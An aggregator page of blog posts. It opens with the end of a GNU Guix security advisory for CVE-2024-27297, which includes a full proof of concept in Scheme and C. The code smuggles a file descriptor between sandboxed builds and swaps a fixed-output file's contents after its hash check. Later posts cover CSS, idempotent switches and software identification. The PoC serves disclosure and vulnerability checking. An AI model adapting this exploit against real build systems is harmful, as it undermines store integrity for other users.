Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728

;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
     (with-imported-modules (source-module-closure '((guix build utils)
                                                     (guix profiles)))
       #~(begin
           (use-modules (guix build utils)
                        (guix profiles))
           (load-profile #+build-profile)
           (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <errno.h>

      int main(int argc, char **argv) {
          setvbuf(stdout, NULL, _IOLBF, 0);

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Set up an abstract domain socket path to connect to.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");

          // Now try to connect, To ensure we work no matter what order we are
          // executed in, just busyloop here.
          int res = -1;
          while (res < 0) {
              printf(\"attempting connection...\\n\");
              res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                    + strlen(\"dihutenosa\")
                    + 1);
              if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
              if (errno != ECONNREFUSED) break;
              usleep(500000);
          }

          // Write our message header.
          struct msghdr msg = {0};
          msg.msg_control = malloc(128);
          msg.msg_controllen = 128;

          // Write an SCM_RIGHTS message containing the output path.
          struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
          hdr->cmsg_len = CMSG_LEN(sizeof(int));
          hdr->cmsg_level = SOL_SOCKET;
          hdr->cmsg_type = SCM_RIGHTS;
          int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
          memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

          msg.msg_controllen = CMSG_SPACE(sizeof(int));

          // Write a single null byte too.
          msg.msg_iov = malloc(sizeof(struct iovec));
          msg.msg_iov[0].iov_base = \"\";
          msg.msg_iov[0].iov_len = 1;
          msg.msg_iovlen = 1;

          // Send it to the other side of this connection.
          res = sendmsg(sock, &msg, 0);
          if (res < 0) perror(\"sendmsg\");
          int buf;

          // Wait for the server to close the socket, implying that it has
          // received the command.
          recv(sock, (void *)&buf, sizeof(int), 0);
      }"))

(define receiver-source
  (mixed-text-file "receiver.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <sys/inotify.h>

      int main(int argc, char **argv) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Bind to the socket.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");
          int res = bind(sock, (const struct sockaddr *)&data,
              offsetof(struct sockaddr_un, sun_path)
              + strlen(\"dihutenosa\")
              + 1);
          if (res < 0) perror(\"bind\");

          res = listen(sock, 1);
          if (res < 0) perror(\"listen\");

          while (1) {
              setvbuf(stdout, NULL, _IOLBF, 0);
              printf(\"accepting connections...\\n\");
              int a = accept(sock, 0, 0);
              if (a < 0) perror(\"accept\");

              struct msghdr msg = {0};
              msg.msg_control = malloc(128);
              msg.msg_controllen = 128;

              // Receive the file descriptor as sent by the smuggler.
              recvmsg(a, &msg, 0);

              struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
              while (hdr) {
                  if (hdr->cmsg_level == SOL_SOCKET
                   && hdr->cmsg_type == SCM_RIGHTS) {
                      int res;

                      // Grab the copy of the file descriptor.
                      memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
                      printf(\"preparing our hand...\\n\");

                      ftruncate(res, 0);
                      // Write the expected contents to the file, tricking Nix
                      // into accepting it as matching the fixed-output hash.
                      write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

                      // But wait, the file is bigger than this! What could
                      // this code hide?

                      // First, we do a bit of a hack to get a path for the
                      // file descriptor we received. This is necessary because
                      // that file doesn't exist in our mount namespace!
                      char buf[128];
                      sprintf(buf, \"/proc/self/fd/%d\", res);

                      // Hook up an inotify on that file, so whenever Nix
                      // closes the file, we get notified.
                      int inot = inotify_init();
                      inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

                      // Notify the smuggler that we've set everything up for
                      // the magic trick we're about to do.
                      close(a);

                      // So, before we continue with this code, a trip into Nix
                      // reveals a small flaw in fixed-output derivations. When
                      // storing their output, Nix has to hash them twice. Once
                      // to verify they match the \"flat\" hash of the derivation
                      // and once more after packing the file into the NAR that
                      // gets sent to a binary cache for others to consume. And
                      // there's a very slight window inbetween, where we could
                      // just swap the contents of our file. But the first hash
                      // is still noted down, and Nix will refuse to import our
                      // NAR file. To trick it, we need to write a reference to
                      // a store path that the source code for the smuggler drv
                      // references, to ensure it gets picked up. Continuing...

                      // Wait for the next inotify event to drop:
                      read(inot, buf, 128);

                      // first read + CA check has just been done, Nix is about
                      // to chown the file to root. afterwards, refscanning
                      // happens...

                      // Empty the file, seek to start.
                      ftruncate(res, 0);
                      lseek(res, 0, SEEK_SET);

                      // We swap out the contents!
                      static const char content[] = \"This file has been corrupted!\\n\";
                      write(res, content, strlen (content));
                      close(res);

                      printf(\"swaptrick finished, now to wait..\\n\");
                      return 0;
                  }

                  hdr = CMSG_NXTHDR(&msg, hdr);
              }
              close(a);
          }
      }"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256
                                      (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output)            ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)

                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

by John Kehayias at Tuesday, March 12, 2024

Sunday, March 10, 2024

Idiomdrottning

Re: I used to think CSS was good

ew0k writes:

We now make stylesheets so complicated that we need to write them with a framework that transpiles it down to CSS before shipping? The purpose of stylesheets is to apply consistent styling across semantically distinct content.

I’m not onboard with that perspective. CSS is the appropriate place for presentation complexity.

He goes on:

JavaScript is not bad. It has its purpose, which for example stylesheets are for? No!

JavaScript mangles semantics in a way that CSS does not.

Dynamic content (such as animated elements) and even some amount of user interaction are well handled by CSS, in a way that affords designers making pages where that stuff can be turned off, ignored, or overridden. That's much more difficult with JavaScript and the virtual DOM. A simple wget -qO- |sed 's;";\n;g' |grep mp3$ is not as easily done with a JavaScript-laden page. CSS doesn't (as often) get in the way of accessing the page's content in a broader, more accessible way.

Now, I do think approaches like “object-oriented CSS” are completely misguided, adding an additional layer into something that was already meant to be the glue between layers. But since the cure for that is to allow the CSS layer to be messy and complex, I have sympathy for people making or using things like SASS or Emacs macros. I think that’s good actually. Tools are our friend here. This webpage has just a few lines of CSS but even then I’ve generated those lines using Liquid conditionals so that, for example, pages that don’t have a blockquote don’t style how blockquotes look.

One opposite approach, Tailwind CSS, I’m not fond of either, since it uses a redundant level of classes but it doesn’t harm anyone else, it’s just a cockamamie way to work.

But a good argument against CSS

Really the only “style” I wanna add to the older, pre-style web pages is max-width on the text but that shouldn’t have to be server-side. There should just be a good default, narrower max-width for the body text on older, unstyled web pages. Server-side styling (the font-size tags and friends) was a mistake.

In practice, I’ve been enjoying epub novels, email, text messages, IRC, and Atom/RSS feeds more than web pages for the past several years. 🤷🏻‍♀️

The web is getting ruined by mandatory darkmode, tracking and popups. Popups have been a scourge on the web since time immemorial but for a while we were able to successfully block them. With CSS that’s way harder.

So yes, CSS is bad if plain text is on the menu, which I’d rather choose any day of the week.

Styling and typography are good things! But it should be client side.

by Idiomdrottning (sandra.snan@idiomdrottning.org) at Sunday, March 10, 2024

Thursday, March 7, 2024

Idiomdrottning

Idempotent switches

One lesson I’ve learned in the past few years is that idempotent is good.

That means a switch you push and it stays pushed even if you push more.
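
In code terms (my own gloss, not from the post): pushing an idempotent switch twice gives the same state as pushing it once, while a toggle undoes itself:


(define (turn-on state) 'on)                           ; idempotent
(define (toggle state) (if (eq? state 'on) 'off 'on))  ; not idempotent

(turn-on (turn-on 'off))   ; => on, same as pushing once
(toggle (toggle 'off))     ; => off, pushing twice undid it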

For example, piping things through kramdown is idempotent:

echo "Eating only spiders and leaves"|kramdown|kramdown|kramdown

A li’l bit of wasted electricity but text doesn’t get borked.

Used to be I thought toggles were really practical and nifty, and steppers that looped around like a Pacman stage.

But on the Mudita Pure phone, the non-idempotent menus were a big problem since the screen didn't work in the dark. I couldn't orient myself through stepping all the way up.

by Idiomdrottning (sandra.snan@idiomdrottning.org) at Thursday, March 7, 2024

Monday, March 4, 2024

GNU Guix

Identifying software

What does it take to “identify software”? How can we tell what software is running on a machine to determine, for example, what security vulnerabilities might affect it?

In October 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) published a white paper entitled Software Identification Ecosystem Option Analysis that looks at existing options to address these questions. The publication was followed by a request for comments; our comment as Guix developers didn’t make it on time to be published, but we’d like to share it here.

Software identification for cybersecurity purposes is a crucial topic, as the white paper explains in its introduction:

Effective vulnerability management requires software to be trackable in a way that allows correlation with other information such as known vulnerabilities […]. This correlation is only possible when different cybersecurity professionals know they are talking about the same software.

The Common Platform Enumeration (CPE) standard has been designed to fill that role; it is used to identify software as part of the well-known Common Vulnerabilities and Exposures (CVE) process. But CPE is showing its limits as an extrinsic identification mechanism: the human-readable identifiers chosen by CPE fail to capture the complexity of what “software” is.

We think functional software deployment as implemented by Nix and Guix, coupled with the source code identification work carried out by Software Heritage, provides a unique perspective on these matters.

On Software Identification

The Software Identification Ecosystem Option Analysis white paper released by CISA in October 2023 studies options towards the definition of a software identification ecosystem that can be used across the complete, global software space for all key cybersecurity use cases.

Our experience lies in the design and development of GNU Guix, a package manager, software deployment tool, and GNU/Linux distribution, which emphasizes three key elements: reproducibility, provenance tracking, and auditability. We explain in the following sections our approach and how it relates to the goal stated in the aforementioned white paper.

Guix produces binary artifacts of varying complexity from source code: package binaries, application bundles (container images to be consumed by Docker and related tools), system installations, system bundles (container and virtual machine images).

All these artifacts qualify as “software” and so does source code. Some of this “software” comes from well-identified upstream packages, sometimes with modifications added downstream by packagers (patches); binary artifacts themselves are the byproduct of a build process where the package manager uses other binary artifacts it previously built (compilers, libraries, etc.) along with more source code (the package definition) to build them. How can one identify “software” in that sense?

Software is dual: it exists in source form and in binary, machine-executable form. The latter is the outcome of a complex computational process taking source code and intermediary binaries as input.

Our thesis can be summarized as follows:

We consider that the requirements for source code identifiers differ from the requirements to identify binary artifacts.

Our view, embodied in GNU Guix, is that:

  1. Source code can be identified in an unambiguous and distributed fashion through inherent identifiers such as cryptographic hashes.

  2. Binary artifacts, instead, need to be the byproduct of a comprehensive and verifiable build process itself available as source code.

In the next sections, to clarify the context of this statement, we show how Guix identifies source code, how it defines the source-to-binary path and ensures its verifiability, and how it provides provenance tracking.

Source Code Identification

Guix includes package definitions for almost 30,000 packages. Each package definition identifies its origin—its “main” source code as well as patches. The origin is content-addressed: it includes a SHA256 cryptographic hash of the code (an inherent identifier), along with a primary URL to download it.

Since source is content-addressed, the URL can be thought of as a hint. Indeed, we connected Guix to the Software Heritage source code archive: when source code vanishes from its original URL, Guix falls back to downloading it from the archive. This is made possible thanks to the use of inherent (or intrinsic) identifiers both by Guix and Software Heritage.
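To make this concrete, here is a sketch of what such a definition looks like in Guile Scheme, modeled on the GNU Hello package (the hash below is a placeholder, not Hello’s real hash):

(use-modules (guix packages) (guix download)
             (guix build-system gnu)
             ((guix licenses) #:prefix license:))

;; Sketch of a package definition: the origin is content-addressed by its
;; SHA256 hash; the URL is merely a hint about where to fetch the code.
(define-public hello
  (package
    (name "hello")
    (version "2.12.1")
    (source (origin
              (method url-fetch)
              (uri (string-append "mirror://gnu/hello/hello-"
                                  version ".tar.gz"))
              (sha256
               ;; Placeholder hash, for illustration only.
               (base32 "0000000000000000000000000000000000000000000000000000"))))
    (build-system gnu-build-system)
    (synopsis "Print a friendly greeting")
    (description "GNU Hello prints a greeting.")
    (home-page "https://www.gnu.org/software/hello/")
    (license license:gpl3+)))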

More information can be found in this 2019 blog post and in the documents of the Software Hash Identifiers (SWHID) working group.

Reproducible Builds

Guix provides a verifiable path from source code to binaries by ensuring reproducible builds. To achieve that, Guix builds upon the pioneering research work of Eelco Dolstra that led to the design of the Nix package manager, with which it shares the same conceptual foundation.

Namely, Guix relies on hermetic builds: builds are performed in isolated environments that contain nothing but explicitly-declared dependencies—where a “dependency” can be the output of another build process or source code, including build scripts and patches.

An implication is that builds can be verified independently. For instance, for a given version of Guix, guix build gcc should produce the exact same binary, bit-for-bit. To facilitate independent verification, guix challenge gcc compares the binary artifacts of the GNU Compiler Collection (GCC) as built and published by different parties. Users can also compare to a local build with guix build gcc --check.

As with Nix, build processes are identified by derivations, which are low-level, content-addressed build instructions; derivations may refer to other derivations and to source code. For instance, /gnu/store/c9fqrmabz5nrm2arqqg4ha8jzmv0kc2f-gcc-11.3.0.drv uniquely identifies the derivation to build a specific variant of version 11.3.0 of the GNU Compiler Collection (GCC). Changing the package definition (patches being applied, build flags, set of dependencies), or similarly changing one of the packages it depends on, leads to a different derivation (more information can be found in Eelco Dolstra's PhD thesis).
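As an illustration, the derivation of a package can be computed from a guix repl session; the sketch below uses the hello package, and the exact /gnu/store file name it returns depends on the Guix revision in use:

;; Sketch (for a `guix repl' session): compute the derivation of the
;; `hello' package and return its content-addressed file name.
(use-modules (guix) (gnu packages base))

(with-store store
  (derivation-file-name (package-derivation store hello)))
;; => "/gnu/store/<hash>-hello-<version>.drv", where <hash> changes whenever
;;    the package definition or any of its dependencies change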

Derivations form a graph that captures the entirety of the build processes leading to a binary artifact. In contrast, mere package name/version pairs such as gcc 11.3.0 fail to capture the breadth and depth elements that lead to a binary artifact. This is a shortcoming of systems such as the Common Platform Enumeration (CPE) standard: it fails to express whether a vulnerability that applies to gcc 11.3.0 applies to it regardless of how it was built, patched, and configured, or whether certain conditions are required.

Full-Source Bootstrap

Reproducible builds alone cannot ensure the source-to-binary correspondence: the compiler could contain a backdoor, as demonstrated by Ken Thompson in Reflections on Trusting Trust. To address that, Guix goes further by implementing so-called full-source bootstrap: for the first time, literally every package in the distribution is built from source code, starting from a very small binary seed. This gives an unprecedented level of transparency, allowing code to be audited at all levels, and improving robustness against the “trusting-trust attack” described by Ken Thompson.

The European Union recognized the importance of this work through an NLnet Privacy & Trust Enhancing Technologies (NGI0 PET) grant allocated in 2021 to Jan Nieuwenhuizen to further work on full-source bootstrap in GNU Guix, GNU Mes, and related projects, followed by another grant in 2022 to expand support to the Arm and RISC-V CPU architectures.

Provenance Tracking

We define provenance tracking as the ability to map a binary artifact back to its complete corresponding source. Provenance tracking is necessary to allow the recipient of a binary artifact to access the corresponding source code and to verify the source/binary correspondence if they wish to do so.

The guix pack command can be used to build, for instance, container images. Running guix pack -f docker python --save-provenance produces a self-describing Docker image containing the binaries of Python and its run-time dependencies. The image is self-describing because the --save-provenance flag leads to the inclusion of a manifest that describes which revision of Guix was used to produce this binary. A third party can retrieve that revision of Guix and from there view the entire build dependency graph of Python, view its source code and any patches that were applied, and do the same recursively for its dependencies.

To summarize, capturing the revision of Guix that was used is all it takes to reproduce a specific binary artifact. This is illustrated by the time-machine command. The example below deploys, at any time on any machine, the specific build artifact of the python package as it was defined in this Guix commit:

guix time-machine -q --commit=d3c3922a8f5d50855165941e19a204d32469006f \
  -- install python

In other words, because Guix itself defines how artifacts are built, the revision of the Guix source coupled with the package name unambiguously identifies the package’s binary artifact. As scientists, we build on this property to achieve reproducible research workflows, as explained in this 2022 article in Nature Scientific Data; as engineers, we value this property to analyze the systems we are running and determine which known vulnerabilities and bugs apply.

Again, a software bill of materials (SBOM) written as a mere list of package name/version pairs would fail to capture as much information. The Artifact Dependency Graph (ADG) of OmniBOR, while less ambiguous, falls short in two ways: it is too fine-grained for typical cybersecurity applications (at the level of individual source files), and it only captures the alleged source/binary correspondence of individual files but not the process to go from source to binary.

Conclusions

Inherent identifiers lend themselves well to unambiguous source code identification, as demonstrated by Software Heritage, Guix, and Nix.

However, we believe binary artifacts should instead be treated as the result of a computational process; it is that process that needs to be fully captured to support independent verification of the source/binary correspondence. For cybersecurity purposes, recipients of a binary artifact must be able to map it back to its source code (provenance tracking), with the additional guarantee that they can reproduce the entire build process to verify the source/binary correspondence (reproducible builds and full-source bootstrap). As long as binary artifacts result from a reproducible build process, itself described as source code, identifying binary artifacts boils down to identifying the source code of their build process.

These ideas are developed in the 2022 scientific paper Building a Secure Software Supply Chain with GNU Guix.

by Ludovic Courtès, Maxim Cournoyer, Jan Nieuwenhuizen, Simon Tournier at Monday, March 4, 2024